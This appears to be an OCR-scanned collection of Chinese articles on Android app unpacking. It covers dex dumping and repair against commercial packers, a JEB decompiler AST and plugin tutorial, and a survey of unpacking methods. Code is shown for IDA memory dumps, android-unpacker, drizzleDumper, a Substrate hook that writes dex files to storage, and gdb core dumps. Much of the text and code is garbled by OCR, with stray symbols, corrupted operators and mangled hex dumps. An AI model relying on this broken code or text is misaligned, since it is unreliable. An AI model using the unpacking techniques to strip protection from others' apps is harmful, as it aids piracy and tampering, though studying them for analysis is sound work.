那个 ， 而 且 方 便 的 是 ， 通 过 这 两 个 对 象 ， 我 们 还 能 很 容易 找到 操作 的 文件 在 内 存 中 的 起 始 地 
址 和 长 度 。 


(2) 主动 加 载 并 初始 化 


这 个 就 是 遍历 dex 文 件 中 class_defs 区 段 里 每 一 个 class_def item， 并 逐一 加 载 和 初始 化 ， 在 
ART X. & 1142 M FindClass H% & 70 KW 3€ > Ensurelnitialized3t 473234416 ; 在 DVM 中 用 
dvmDefineClass #2 ài > dvmlsClasslnitialized 和 dvmlnitClass 来 初始 化 。 


(3) 转 储 并 自动 修复 
最 后 就 是 丨 正 抓 取 dex 了 。 把 dex 分 为 三 部 分 : 


Part 1: class_defs 之 前 的 内 容 

Part 2: class_defs 段 

Part 3: class_defs 后 边 的 部 分 

我 们 把 Part 1 存在 part1 文 件 里 ，Part 3 存在 data 文 件 中 ，Part 2 先 不 要 急 。 


现在 我 们 要 解析 class_defs 的 东 东 了 。 不 整 代码 了 ， 用 文字 简单 来 说 ， 就 是 模仿 Android 的 过 
程 ， 我 们 把 每 个 class_data_item 解 码 为 内 存 中 的 对 象 《 有 LEB128 编 码 ) ， 便 于 我 们 的 修复 。 


看 class_def item 中 的 class_data_off 是 不 是 在 之 前 拿 到 的 dex 文 件 的 内 存 范 围 内 ， 如 果 跑 出 
去 了 ， 就 需要 把 这 个 类 的 class_data_item 给 放 到 dex 尾 部 去 ， 修 改 class_def_item 并 保存 。 


比较 解析 出 来 的 accessflag、codeoff 和 运行 时 生成 的 方法 对 象 的 accessflag、codeoff， 如 果 
不 一 致 ， 以 运行 时 中 的 为 准 ， 并 修改 保存 。 


同样 ， 检 查 code_item_off 是 否 出 界 了 ， 一 旦 出 界 ， 把 code_item 收 回来 ， 继 续 向 尾部 添加 ， 并 
修改 class_def item 的 相关 内 容重 新 保存 。 


当然 了 ， 所 谓 放 到 尾部 ， 只 是 先 保 证 偏 移 值 从 尾部 开始 的 ， 丨 正 的 内 容 先 存在 extra 文 件 了 。 
被 修改 过 的 class_defs 段 ， 就 保存 在 classdef 文 件 中 了 。 


然后 我 们 把 四 个 文件 重新 拼 起 来 ， 就 得 到 原始 的 dex 或 odex 了 。 


0x06 有 趣 的 现象 


最 后 聊 一 下 我 们 看 到 的 一 些 有 趣 的 现象 。 
360 基 本 上 是 把 原始 的 dex 加 密 存 在 了 一 个 so 中 ， 加 载 之 前 解密 。 


阿里 把 一 些 class_data_item 和 code_item 拆 出 去 了 ， 打 开 dex 时 会 修复 之 间 的 关系 。 同 时 一 些 
annotation_off 是 无 效 的 的 来 防止 静态 解析 。 


百度 是 把 一 些 class_data_item 拆 走 了 ， 与 阿里 很 像 ， 同 时 它 还 会 抹 去 dex 文 件 的 头 部 ; CUS 
选择 个 别 方法 重新 包装 ， 达 到 调用 前 还 原 ， 调 用 后 抹 去 的 效果 。 我 们 可 以 通过 对 Dolnvoke 
(ART) 和 dvmMterp_invokeMethod (DVM) 监 控 来 获取 到 相关 代码 。 


BRER e de Jm BF 5 360 8) BK ARR. ^ BRE de —JÉread, write, mmap 等 libc 函 数 hook 了 ， 防 止 读 取 
相关 dex 的 区 域 ， 爱 加 密 的 字符 串 会 变 ， 但 是 只 是 文件 名 变 目 录 不 变 。 


腾讯 针对 于 被 保护 的 类 或 方法 造 了 一 个 假 的 class_data_item ， 不 包含 被 保护 的 内 容 。 监 正 的 
class data item &4& i£ (1 8] EL AR EE 2 7E 3E 4& E. » f£ X code item 却 始终 存在 于 dex 文 件 里 ， 
它 用 无 效 数据 填充 annotation_off 和 debug_info_off 来 实现 干扰 反 编 译 。 


0x07 参考 


https://source.android.com/devices/tech/dalvik/dex-format.html 
llibcore/libart/src/main/java/java/lang/ClassLoader.java 
llibcore/libdvm/src/main/java/java/lang/ClassLoader.java 
llibcore/dalvik/src/main/java/dalvik/system/DexClassLoader.java 
llibcore/dalvik/src/main/java/dalvik/system/PathClassLoader.java 
https://github.com/anestisb/oatdump plus£dalvik-opcode-changes-in-art 


原文 by hqdvista 


0x00 WS & 背景 


AA xt A smalifejdgui4 FiA grep xk grep *E ? 本 系列 教程 将 围绕 Soot 和 JEB, 讲 述 Android 
应 用 的 进 阶 分 析 , 感 受 鸟 枪 换 炮 的 快感 . 


JEB 是 Android 应 用 静态 分 析 的 de facto standard, 除 去 准确 的 反 编译 结 果 、 高 容错 性 之 外 ,JEB 
提供 的 APl 也 方便 了 我 们 编写 插件 对 源 文件 进行 处 理 ,实施 反 混淆 其 至 一 些 更 高 级 的 应 用 分 析 来 
方便 后 续 的 人 工分 析 . 本 系列 文章 的 前 几 篇 将 对 JEB 的 API 使 用 进行 介绍 ,并 实战 如 何 利 用 开发 
者 留 下 的 蛛丝马迹 去 反 混淆 . 先 来 看 看 我 们 最 终 编写 的 这 个 自动 化 反 混淆 插件 实例 的 效果 : 


初 识 JEBAPI 


反 混淆 前 : 
public final class za | 
private String a; 
private -trino b; 
private String c; 
private String d; 
private String e}; 
private Strina f; 
private String g; 
private String h; 
public za() || 
super(); 
} 
public final String a() { 
return this.b; 
} 
public final void a(String argl) (| 
this.b = argl; 
] 


public final String b() { 
return this.g; 
} 


this.g = argl; 
} 


return this.3; 
} 


public final void c(String argl) (| 
this.a = argl; 


} 

public final String d() { 
return this.c; 

} 


public final void d(String argi) (| 
this.c = argl; 
] 





public final String e() { 
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import android.app.Activity; 
import android.os.Bundl 
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public interface A | 


void a(); 

void al argl); 

void al argl, arg2); 
void bí); 

void bl argl); 

void bl argl, arg2); 
void c( argl); 
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初 识 JEBAPI 


public final class UpdateEntity | 
private String info; 
private String name; 


private String size; 
private String type; 
private String url; 
private String version; 
private String pri; 
private String md5; 


public UpdateEntity() { 


super (); 

} 

public final String getName() ( 
return this.name; 

} 

public final void setName (String argl) { 
this.name = argi; 

} 

public final String getPri() { 
return this.pri; 

} 

public final void setPri(String argl) { 
this.pri = argi; 

} 


public final String getInfo() (| 
return this.info; 


} 

public final void setInfo(String argl) { 
this.info = argil; 

} 


public final String getSize() | 
return this.size; 
} 
+ 
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可 以 看 到 很 多 类 名 和 field 名 都 被 恢复 出 来 了 . 读者 朋友 肯定 会 好 奇 这 是 如 何 做 到 的 , 那 我 们 首 
先 来 看 下 JEB 提 供 API 的 结构 : 


0x01 JEB AST API 结 构 


JEB 的 AST 与 Java 的 AST 稍 有 不 同 ,但 大 体 还 是 很 相似 的 ,只 是 做 了 些 简化 .所 有 的 AST Element 
实现 jeb.api.ast.IElement, 要 么 继承 于 jeb.api.ast.NonStatement, 要 么 继承 于 
jeb.api.ast.Statement. 他 们 的 关系 如 下 图 所 示 : 





NonStatement Statement 


IElement 定 义 了 getSubElements, 但 不 同类 型 的 实现 和 返回 结果 也 不 同 ,例如 对 Method 进 行 
getSubElements 调 用 的 返回 会 是 函数 的 参数 定义 语句 和 函数 体 block, 而 IfStmt 会 返回 判断 使 用 
的 Predicate 和 每 一 个 if/else/ifelse 语 句 块 .而 一 个 Assignment 语 句 则 会 返回 左右 |Expression 操 
作 数 ,以 及 Operator 操 作 符 .具体 编写 脚本 中 我 们 通常 并 不 使 用 这 个 函数 ,而 根据 具体 类 型 定义 的 
更 细致 的 函数 ,例如 Assignment 提 供 的 getLeft 和 getRight. 





wie OCYUN.org 


以 下 面 的 函数 为 例 ,我 们 来 分 析 它 具体 由 哪些 AST 元 素 组 成 . 


boolean isZtzi162(Ztz ztz) ( 

boolean bool - true; 
Redrain redrain = Redrain.getInstance("AnAn"); 
if(redrain.canShoot()) { 

redrain.shoot(163); 

if(ztz.isDead()) { 

bool - false; 
} 


else if(ztz.height + Integer.parseInt(ztz.shoe) > 162) { 
bool = false; 
} 


return bool; 


首先 来 看 下 
NonStatement 


在 文档 中 , NonStatement 的 描述 是 Base class for AST elements that do not represent 
Statements. , 即 所 有 不 是 Statement 的 AST 结 构 继承 于 NonStatement, 如 下 图 所 示 : 


ras /N 
| 
l 








NonStatement 一 = 一 一 一 


A hei I PM 





pee] [ens] [Eee Fa] [une] [cere] [enon] [nen 
drops.wooyun.org 


NonStatement4 Expression & 4] Æ T, NonStatement &, 4: f — € g M25 43 15] Je 
jeb.api.ast.Class, jeb.api.ast.Method 这 些 并 不 会 出 现在 语句 中 的 AST 结 构 体 ,他 们 分 别 代 表 一 
个 Class 结 构 和 Method 结 构 , 注 意 不 要 与 反射 语句 中 使 用 的 Class 和 Method 混 消 . 


Statement 


Statement 顾 名 思 义 就 代表 了 一 个 语句 ,但 值得 注意 的 是 这 里 的 语句 并 不 代表 单个 语句 ,继承 于 
Compound 的 Statement 中 也 可 能 包含 其 他 的 Statement. 例 如 下 面 这 段 代码 : 


if(ztz.isDead())//redundant statement to demonstrate if-else 


{ 

return false; 
H 
else{ 

return enue; 
} 


这 事实 上 是 一 整个 继承 于 Compound 的 IfStm, 也 就 是 Statement. 


Statement 的 继承 关系 图 如 下 图 所 示 


rosaman | [s] [Ea] [eure [eme] [omes] [So] [rer] [on] [e] [n] [rw] [n 
drops.wooyun.org 


非 Compound 的 Statement 是 最 基本 的 语句 结构 , 它 的 子 节点 只 会 由 Expression 构 成 而 不 会 包含 
block. 例如 Assignment, 可 以 通过 getLeft 和 getRight 调 用 获得 左右 两 边 的 操作 对 象 ,分 别 为 
ILeftExpression 和 1IExpression.ILeftExpression 代 表 可 以 做 左 值 的 Expression, 例 如 变量 .而 常量 
显然 不 实现 ILeftExpression 接 口 


Compound 


Compound 代 表 多 个 语句 集合 的 语法 块 集合 ,每 一 个 语法 块 以 Block (也 是 Compound 的 子 类 ) 
呈现 ,通过 getBlocks 调 用 获得 .所 有 分 支 语 句 均 继承 Compound, 如 下 图 所 示 : 


Statement 


PN 


drops.wooyun.org 


在 上 面 提 到 的 例子 中 ,lfStmt 就 是 一 个 Compound, 我 们 通过 getBranchPredicate(idx) 获 取 
Predict, 35 X ztz.isDead()3 4- Expression, 9 3& 4- Expression & E 85 X 72 & F XX Call. 4411 9T YA 
i it getBranchBody(idx) & Riff if-else ? 55 Block, 34 iQ getDefaultBlock # Xelse $5 Block 


IExpression 


IExpression 代 表 了 最 基本 的 AST 节 点 ,其 实现 关系 如 下 图 : 
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IExpression 接 口 的 实现 者 Expression 类 代表 了 算术 和 逻辑 运算 的 语句 片段 ,例如 atb, "162" + 
ztz.toString(), !ztz, redrain*(ztz-162) 等 等 ,同时 Predicate 类 是 Expression 类 的 直接 子 类 , 壁 如 在 
if(ztz162) 中 ,该 语句 的 Predicate 左 值 为 ztzz162 这 个 identifier, 右 值 为 null. 


以 ztz.test(1) + "height" + 162 这 个 Expression 为 例 ,其 结构 组 成 和 各 节点 类 型 如 下 : 


ztz.test(1) + "height" + 162 


162 


m$. T. 


getRight 


ztz.test(1) "height" 


pe 
getSubElements 
oM. NN 


Tm 





值得 注意 的 有 如 下 几 点 : 


Expression 是 从 右 到 左 的 结构 
Call 没 有 提供 获取 caller 的 APl, 不 过 可 以 通过 getSubElements() 获 取 , 返 回 顺序 为 


callee method 

calling instance (if instance call) 
calling arguments, one by one 
InstanceField, StaticField 和 Field 


三 者 的 关系 如 下 图 所 示 : 





N 
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| X 


| \, 
NonStatement Statement 


InstanceField£eStaticField & Field. InstanceField 通 过 getlnstance 调 用 获取 一 个 IExpression， 
也 就 是 Field 的 container. Field 本 身 是 Class 的 元 素 ,而 InstanceField 与 StaticField 则 是 它 的 具体 
实例 化 . 


IExpressi 


实例 Method 分 析 


ARIE 04€ 8| HisZtz162 HAA bl), € MAST H Tg TF : 


- jeb.api.ast.Method (getName() == "isZtz162") => getBody() 
- Block => block.get(i) //% block? 78 4 
- Assignment "boolean bool = true" => getSubElements 
- Definition "boolean bool" 
- Identifier "bool" 
- Constant "true" 


- Assignment "Redrain redrain = Redrain.getInstance("AnAn");" => getSubElemen 
ts 
- Definition => getSubElements (注意 它 是 父 assignment 的 getLeft 返 回 结果 ( 左 值 ) ) 
- Identifier "redrain" 
- Call "Redrain.getInstance("AnAn)"" (286 = Xassignment 4 getRight& 9 4s R ( 
右 值 ) ) 


- ...(omit) 
- IfStmt (Compound) => getBlocks() 

- Block (if block) => block.get(i) 遍历 block 中 的 语句 
- Call "redrain.shoot(163);" 
- IfStmt (Compound) 

- ...0mit 

- Block (elseif block) => block.get(i) 遍历 block 中 的 语句 
- Assignment "bool - false'" 
- ..Omit 


可 以 通过 如 下 代码 来 递归 打印 一 个 Method 中 的 各 个 Element: 


class test(IScript): 


def run(self, j): 
self.instance - j 
sig - self.instance.getUI().getView(View.Type.JAVA).getCodePosition().getSignature 
() 
currentMethod - self.instance.getDecompiledMethodTree(sig) 
self.instance.print("scanning method: " + currentMethod.getSignature()) 


body = currentMethod.getBody() 
self.instance.print(repr(body)) 
for i in range(body.size()): 

self .viewElement(body.get(i),1) 


def viewElement(self, element, depth): 
self.instance.print(" "*depth+repr (element ) ) 
for sub in element.getSubElements(): 
self.viewElement(sub, depth-*i) 


输出 结果 如 下 : 
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.Method@5ca02f89 


Definition@1890fae1 
ast.Identifier@5646d660 
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ast .Method@5f8b8d80 
ast.InstanceFieldQ42f6ff81 
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Predicate@708d094c 
ast.CallQ3b5d964e 
api.ast.MethodQ7d36f954 
jeb.api.ast.Definition@242b3a05 
jeb.api.ast.IdentifierQ11ee30d0 
jeb.api.ast.Block@2cc6b0e2 
api.ast.Identifier@4c4c3186 
Block@2886dc65 
ast.Assignment@2def7fac 
api.ast.Identifier@38ffa6bd 
api.ast.Constant@46a70cc3 


BlockQ136fa72 

ast .Assignment@407452fd 
api.ast.Identifier@38ffa6bd 
api.ast.Constant@46a70cc3 
Return@14f4811a 
ast.Identifier@38ffa6bd 


对 AST 结 构 的 分 析 就 到 这 里 ， 本 文选 取 了 几 种 最 典型 的 做 了 讲解 .此 外 JEB 还 提供 了 


x 


jeb.api.dex, 提 供 了 对 dex 文 件 的 操作 API. 由 于 这 方面 资料 比较 多 ,这 里 就 先 不 资 述 了 . 


0x02 实例 分 析 之 开发 环境 配置 


JEB 原 生 支 持 Java 和 Python 两 种 语言 进行 开发 ,后 者 的 支持 是 通过 Jython 实 现 的 .这 里 简便 起 见 
我 们 的 例子 均 以 Python 为 例 .个 人 建议 想 使 用 前 者 的 话 最 好 使 用 Scala, 否 则 Java 本 身 实在 太 罗 


KT 


Java 
在 eclipse 中 配置 好 classpath 中 的 library 指 向 bin/jeb.jar, 同 时 将 javadoc 路 径 指 向 
jeb/doc/apidoc.zip 即 可 . 


v (9 jeb.jar - /home/hqd/jeb/bin 
Source attachment: (None) 





(a) Javadoc location: file:/home/had/jeb/doc/apidi 
x Native library location: (None) 


&& Access rules: (No restrictions) 
(& Javadoc in archive 


drops.wooyun.org 


@ External file Workspace file 





Archive path: /home/hqd/jeb/doc/apidoc.zip 





Path within archive: 
drops.wooyun.org 


Python 


Python 环境 配置 相对 麻烦 点 ,因为 JEB 并 没有 提供 相对 应 的 skeleton, 寻 致 Python 的 IDE 中 默认 
没有 代码 补 全 ,需要 自行 配置 .笔者 使 用 了 PyCharm 的 JythonHelper 插 件 ,可 以 帮助 生成 skeleton 
从 而 有 基本 的 代码 补 全 . 


Jython Helper 





class Method: 


def replaceSubELlement | IElement- , IElementl- 


pass 


equals | 


pass 


getBody | 


pass 


getSubElements | 
pass 


getSignature | 


Pass 


getContainingClass | 


pass 


getParameters | 


pass 


staticme 





def wi ct= 


配置 好 环境 后 ,我 们 来 编写 一 个 最 简单 的 插件 : 输出 光标 所 在 位 置 的 method signature, 代 码 如 
下 所 示 : 


from jeb.api import IScript 
from jeb.api.ui import View 
class test : 


def run ; 
self.instance = j 
sig = self.instance.getUI().getView(View. Type. JAVA) .getCodePosition().getSigna 
ture() 
currentMethod = self.instance.getDecompiledMethodTree(sig) 
self.instance.print("scanning method: " + currentMethod.getSignature() ) 


保存 为 test.py, 点 击 File->Run Script->test.py JEB 就 会 在 下 面 的 console 中 输出 当前 光标 所 在 
函数 的 signature. 


0x03 总 结 


本 文 介绍 了 JEB Java AST API 的 基本 知识 和 插件 编写 入 门 ,同时 也 可 以 作为 一 个 APIDoc 的 补 
充 参考 .在 下 一 篇 文章 中 我 们 将 会 根据 实例 讲解 如 何 编 写 高 级 的 更 复杂 的 插件 . 


初 识 JEBAPI 


源 代码 和 测试 样 例 在 https://github.com/flankerhqd/jebPlugins 可 以 找到 。 


English version of this article can be found at http://blog.flanker017.me/advanced-android- 
application-analysis-jeb-api-manual-and-plugin-writing/ 
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常见 app 加 固 厂 商 脱 党 方法 


原文 by mottoin 


Apk x #2474 


也 就 是 一 个 manifest » M java jar 文件 引入 的 掏 述 包 信 息 的 目录 


如 果 存 在 的 话 ， 存放 的 是 ndk 编 出 来 的 so EE 
程序 全 局 配置 文件 








Dex x £F 2E 44 
00000000h: 64 65 78 OA 30 33 35 00 FS 56 95 62 F2 D6 57 SF ; dex.035. W_ 


Dex 文 件 的 ”Dex 文件 的 ”检验 码 字 段 ”检验 码 字段 
标识 符 dex ”版 本 035 法 adler32 SHA-1 签 名 
|00000010h: FE 15 B3 E1 5A FO 5C 8B Ci DC E9 E3 1F 31 8F 8F ; WzR? 


igi im BEB eee 先 使 用 第 一 个 检验 码 进行 快 


oon 使 用 第 二 个 复杂 的 检验 码 进行 复杂 计 
保证 安全 性 和 效 
00000020h: 84 08 00 00 70 00 00 00 00 78 56 34 12 00 00 00 00 ; ?..p...xV4..... 

Dex 文 件 的 ”文件 头 文件 头 长 度 PINS ee ‘ea a 

总 长 度 035 版 TFHA EN 

=0x70, 
ANE Do 

00000030h: 00 00 00 00 B4 07 00 00 2C 00 00 00 70 00 00 00 ; ....2..,...D... 








段 的 开 ee Esih A eee 


£i RA 这 个 基 址 就 
eo a zimap E BERE 
Hz - e offset 
将 据 的 长 度 和 长 EA 


|00000040h: 14 00 00 00 20 01 00 00 07 00 OO OO 70 01 OO OO ; .... ....... Pp... 
LS TT 


类 型 列表 里 DRE ”原型 列表 里 原 原型 列表 基地 
类 型 个 数 。 ir. 型 个 数 。 址 。 


|00000050h: Be nw BN Hs 00 00 00 C4 01 00 OO 10 00 OO 00 D4 01 00 00 ; ....2...... ?.. 


inne 字段 列表 基 ，” 方 法 列表 里 方 方法 列表 基地 
字段 个 数 。 地址 法 个 数 。 ik. 
|00000060n: os 00 00 un $4 82 HH GB uH B5 HB BB FA B2 BH OB PF ..E..:9.:2.. 
类 定义 类 表 ”类 定义 列表 ”数据 段 的 大 小 数据 段 基地 址 
中 类 的 个 数 SE ”必须 以 4 学 节 ` 


miDexsctt nis 
7 iwee "mi, Ly 


e 
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x 


第 一 代 壳 Dextre X 


ex: 


Dex 4 $235 
资源 加 密 

对 抗 反 编 译 

反 调 试 

自 定 义 DexClassLoader 


ak WN 一 


第 二 代 壳 Dex 抽 取 与 So 加 


对 抗 第 一 代 沉 常见 的 脱 沉 法 

Dex Method 代 码 抽 取 到 外 部 (通常 企业 版 ) 
Dex 动 态 加 载 

So 加 


e 0O N = 


PIRE Dex 动 态 解 密 与 So 混 消 
1. Dex Method 代 码 动 态 解 密 ** 

2，So 代 码 膨胀 混淆 

3， 对 抗 之 前 出 现 的 所 有 脱 这 法 

第 四 代 壳 arm vmp (未 来 ) 

vmp 


过 的 识别 


1. 用 加 固 厂商 特征 : 


Wi»: libchaosvmp.so , libddog.solibfdog.so 
e 爱 加 密 : libexec.so, libexecmain.so 


PREP : libsecexe.so, libsecmain.so , libDexHelper.so 
e 360 : libprotectClass.so, libjiagu.so 

e 通 付 后 : libegis.so 

网 秦 : libnqshield.so * 百 度 libbaiduprotect.so 


基于 特征 的 识别 代码 





内 存 Dump 法 
文件 监视 法 
Hook 法 

定制 系统 
动态 调试 法 


ak WN 一 


A 4 Dump:;X 


常见 app 加 固 厂 商 脱 党 方法 


内 存 中 寻找 dex.035 或 者 dex.036 
/proc/xxx/maps 中 查找 后 ， 手 动 Dump 


import idaapi 
import struct 


def dumpdex(start, len, target): 

rawdex = idaapi.dbg_read_memory(start, len) 
fd = open(target, 'wb') 

fd.write(rawdex) 

fd.close() 


def getdexlen(start): 

pos = start + 0x20 

mem = idaapi.dbg. read memory(pos, 4) 
len = struct.unpack('«I', mem)[0] 
print 'len is ' + str(hex(len)) 
return int(len) 


start = AskAddr(0, ‘Input DexFile start in hex: ') 
print('start is ' + str(hex(start))) 


len = AskLong(getdexlen(start), 'Input DexFile len in hex: ') 
target = AskStr('/users/boyliang/temp/xx.dex', 'Input the dump file path') 


if len > 0 and start > 0x0 and target and AskYN(1, ‘start is @x%@x, len is %d, dump to %s' % (start, len, target)) 
dumpdex(start, len, target) 
print('Dump Finish') 
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常见 app 加 国 厂 商 脱 党 方法 


android-unpacker https://github.com/strazzere/android-unpacker 


printf(" [+] %d is clone pid\n", clone_pid); 


int mem file = attach get memory(clone pid); 

if(mem file == -1) { 
printf(" [!] An error occurred attaching and finding the memory!\n"); 
return -1; 


// Determine if we are dealing with APKProtect or Bangcle 
char xextra filter - determine filter(clone pid, mem file); 


memory region memory; 

if(find magic memory(clone pid, mem file, &memory, extra filter) <= 0) { 
printf(" [!] Something unexpected happened, new version of packer/protectors? Or it wasn't packed/pr 
return =1; 

} 


printf(" [+] Unpacked odex found in memory!\n"); 


// Build a safe file to dump to and call the memory dumping function 
char xdumped file name = malloc(strlen(static_safe_location) + strlen(package name) + strlen(suffix)); 
sprintf(dumped file name, "%s%s%s", static safe location, package name, suffix); 
if(dump memory(mem file, &memory, dumped file name) <= 0) { 
printf(" [!] An issue occurred trying to dump the memory to a file!\n"); 
return -1; 
} 
printf(" [+] Unpacked/protected file dumped to : %s\n", dumped file name); 


close(mem file); 


ptrace(PTRACE DETACH, clone pid, NULL, 0); 
return 1; 
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drizzleDumper https://github.com/DrizzleRisk/drizzleDumper 
升级 版 的 android-unpacker，read 和 lseek64 代 替 pread， 匹 配 dex 代 替 匹 配 odex 


int main(int argc, char xargvI[1) { 


printf("[>>>] This is drizzleDumper [<<<]\n"); 

printf (" [>>>] code by Drizzle [<<<]\n"); 

printf (" [>>>] 2016.05 [<<<]\n"); 

if(argc <= 1) { 
printf("[*] Useage : ./drizzleDumper package name wait_times(s)\n[*] The wait times(s) 
return 0; 

H 


//Check root 

if(getuid() != 0) { 
printf("[x] Device Not root!\n"); 
return -1; 


} 


double wait_times = 0.01; 
if (argc >= 3) 


{ 
wait_times = strtod(argv[2], NULL); 
printf("[x] The wait_times is %ss\n", argv[2]); 
dumpDex 


基于 IDA python 的 Android DEX 内 存 dump 工 具 
Usage 


First: 通过 IDA 的 module 模 块 找到 libdvm.so->dvminternalnatimeshutdown (保证 光标 停留 在 该 函数 的 第 一 行 即 可 ) ， 然 后 
运行 findcookie.py 

Second: 从 控制 台 的 输出 中 找到 合适 的 DexFile address (通常 有 多 个 ， 通 过 name 进 行 判断 ) ， 修 改 dump2.py 中 倒数 5 行 的 
address， 然 后 运行 dump2.py 


文件 监视 法 


Dex 优 化 生成 odex 
inotifywait-for-Android https://github.com/mkttanabe/inotifywait-for-Android 
监视 文件 变化 


# ./inotifywait -r -m /data /cache /system 
Setting up watches. Beware: since -r was given, this may take a while! 
atches established. 


/system/framework/ ACCESS framework-res.apk 
/system/framework/ ACCESS framework-res.apk 
/data/app/ OPEN com.example.helloapp-1.apk 

/data/app/ ACCESS com.example.helloapp-1.apk 
/data/app/ ACCESS com.example.helloapp-1.apk 
/data/app/ ACCESS com.example.helloapp-1.apk 


/data/app/ ACCESS com.example.helloapp-1.apk 

/data/app/ ACCESS com.example.helloapp-1.apk 

/data/app/ ACCESS com.example.helloapp-1.apk 

/data/app/ OPEN com.example.helloapp-1.apk 

/data/app/ ACCESS com.example.helloapp-1.apk 

/data/dalvik-cache/ OPEN dataQapp8ücom.example.helloapp-l.apk8classes.dex 
/data/dalvik-cache/ ACCESS data@app@com.example.helloapp-1.apk@classes.dex 
/data/dalvik-cache/ ACCESS data@app@com.example.helloapp-1.apk@classes.dex 
/data/app/ OPEN com.example.helloapp-1.apk 

/data/app/ ACCESS com.example.helloapp-1.apk 





notifywait-for-Android https://github.com/mkttanabe/inotifywait-for-Android 
监视 DexOpt 输 出 


GC CONCURRENT freed 251K, 3% free 9398K/9684K, paused 
eee PREF: d l Sah roid: getsharedPret: ge 
eee PREF: android:gets SharedPref:gets 
See PREF: android: getsharedPret: zetster 
wee PREF: android: getSharedPref:getst 
tts FREF; android: getSharedPret:i zgetst 
#8 PREF: android: getSharedPretf:getStr 
Dexüpt: --- BEGIN {2#abeTaassed?.dex' i 
569): MS:Notice: Injecting: /system/bin/dexopt 
Dexüpt: 'Landroid/annotation/SuppressLint;' has an earlie 
DexOpt: ‘Landroid/annotation/Targetapi;' has an earlier d 
Dexüpt: not verifying/optimizing "Landroid/annotation/ Sup 
DexOpt: not verifying/optimizing 'Landroid/annotation/Targ 
t: Load l6ms, verify*opt llsms, 735796 bytes 





() t 


( tinotifytools_initialize() 

| !inotifytools, watch, recursively( 

fprintf(stderr, "s\n", strerror( inotifytools_error() ) ); 
Lr 


inotifytools set printf timefmt( "N 


struct inotify_event * event = inotifytools_next_event( -1 IP 


( event ) { 
inotifytools_printf( event, "MT Wef %e\n" ); 
(stremp(event->name, 


system( 
printf ( 


event = inotifytools_next_event( -1 ); 





Hook 法 


Hook dvmDexFileOpenPartial 





sa Only in DvmD 


(const void[ addr) int[ 1en) DvmDex** ppDvmDex ) 





D le* pDexFile; 
int parseFlags = kDexParseDefault; 
int result = -1; 
/* -- file is incomplete, new checksum has not yet been calculated 
if (gDvm.verifyDexChecksum) 
parseFlags |= kDexParseVerifyChecksum; 
*/ 







NUL 
GE("DEX parse failed"); 
goto bail; 





MSInitialize { 


. android log print(ANDROID LOG ERROR, TAG, "Substrate initialized."); 
MSImageRef image; 


image = MSGetImageByName("/system/lib/libdvm.so"); 载 入 Lib 


if (image != NULL) { 
void * dexload-MSFindSymbol(image," Z21dvmDexFileOpenPartialPKviPP6DvmDex"); 
if(dexload--NULL) ( 
LOGD("error find Z21dvmDexFileOpenPartialPKviPP6DvmDex "); 
) else{ 
MSHookFunction(dexload, (void*)&mydvmdexfileopen,(void **)&olddexfileopen);: 


) 
) eise ( 

LOGD("ERROR FIND LIBDVM"); 
} 


int (* olddexfileopen) (const void * addr,int len,void ** dvmdex); 
int mydvmdexfileopen(const void * addr,int len,void ** dvmdex) { 
LOGD("call my dvm dex!!:%d",getpid()); 
char buf[200]; 


Sprintf(buf,"/sdcard/dex.$d",random()); 导出 dex 文 件 
FILE * f=fopen(buf,"wb"); 
if(!f) { 
LOGD("error open sdcard file to write"); 
} else { 
fwrite(addr,1,len,f); 
fclose(f); 


return olddexfileopen(addr,len,dvmdex); 


定制 系统 


修改 安 草 源码 并 刷机 
int dvmDexFileOpenPartial(const void* addr, int len, DvmDex** ppDvmDex) 
d 
DvmDex* pDvmDex; 
DexFile* pDexFile; 
int parseFlags - kDexParseDefault; 
int result - -1; 


pDexFile - dexFileParse((ul*)addr, len, parseFlags); 


#ifdef ARM EABI _ 
ALOGE("lfx: addr - $08x, len - $d, parseFlags - $d", (u4)addr, len, parseFlags); 
char path[40] = (0); 
sprintf(path, "/data/local/$d.dex", getpid()); //data/local 普通 应 用 没有 读 写 权限 
ALOGE("path = %s", path); 


int fd = open(path, O CREAT | O_RDWR, 0644); 


g if(fd)( 
ALOGE("dumping dex.."); 
int ret - Xwrite(fd, addr, len); 
ALOGE("dump dex finished..ret - $d....",ret); 
close(fd); 
J }else{ 


ALOGE ("fwrite failed."); 


常见 app 加 国 厂商 脱党 方 ; 


A 


DumpApk https://github.com/CvvT/DumpApk 


只 针对 部 分 沉 


原理 挺 简 单 ， 大 伙 直 接 看 代码 就 一 清二 楚 了 。 


使 用 步骤 : 


1. 点 击 启动 应 用 后 可 以 在 log 输 出 中 找到 cookie 


adb logcat -s cc 


2.dump 指 定 cookie 对 应 的 dex 文 件 (直接 从 odex 中 扣 取 dex 文 件 ) 
adb shell am broadcast -a com.cc.dumpapk --ei cmd 1 --ei cookie xxxxxxx 


注 : 我 将 需要 hook 的 应 用 包 名 com.cc.test 硬 编码 到 程序 中 ， 只 能 dump 这 个 应 用 ， 有 需要 的 请 


需要 放置 到 /system/lib/ 目 录 下 


3.dump 出 的 dex 文 件 : /data/data/com.cc.test/whole.dex<br> 


行 修改 ,以 及 编译 好 的 so 文件 


测试 腾讯 的 时 候 直 接 dump 的 dex 代 码 中 含有 odex opcode， 本 来 想 那 就 直接 dump 整 个 odex 文 件 ， 但 是 不 知道 为 何 dump 出 来 


的 odex 经 过 baksmali.jar 处 理 报 了 一 堆 错 误 ， 调 试 多 天 无 果 。 众 。 
还 没 来 得 及 测试 其 他 加 固 产品 ， 脱 壳 原 理 可 能 比较 有 针对 性 ， 因 而 不 适合 其 他 产品 。 


动态 调试 法 


_Z14dvmJarFileOpenPK 
_Z17dvmRawDexFileOp 
_Z22dvmRawDexFileOp 
by zZ20dvmOpenCachedD 
D "ZN12gossip loccsóFilte 
b] zi7dexZipOpenArchive 























Copy 
Copy all 

NP Quick filter 

NE Modify filters... 
Reset filters 


W* Add breakpoint 


ff Enable breakpoint 
B Disable breakpoint 
XC Delete breakpoint 


Pleats antar coript body 


Name static main(void) 


©} Detaut sripper* 


auto £p, begin, end, dexbyte; 


Fp © Fopen("CzNNdunp dex", "wb"); 
begin © r$; 
end * r$ * rt; 


for 4 dexbyte = begin; dexbyte < end; dexbyte 


++) 
Fputc(Byte(dexbyte), Fp}; 
) 


Une 1of1 Line:10 Coluan:1 


Ecripting Jangouge [are TIS sies 4 


56137068 86 82 





| dmm || Sarre 








dex.635.1P4....y 
-2Ar....mQ.A.U.. 
-S n L 
ST UH UE 
= 
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gdb gcore 法 


.gdbserver :1234 -attach pid 
.gdb 

(gdb) target remote :1234 
(gdb) gcore 


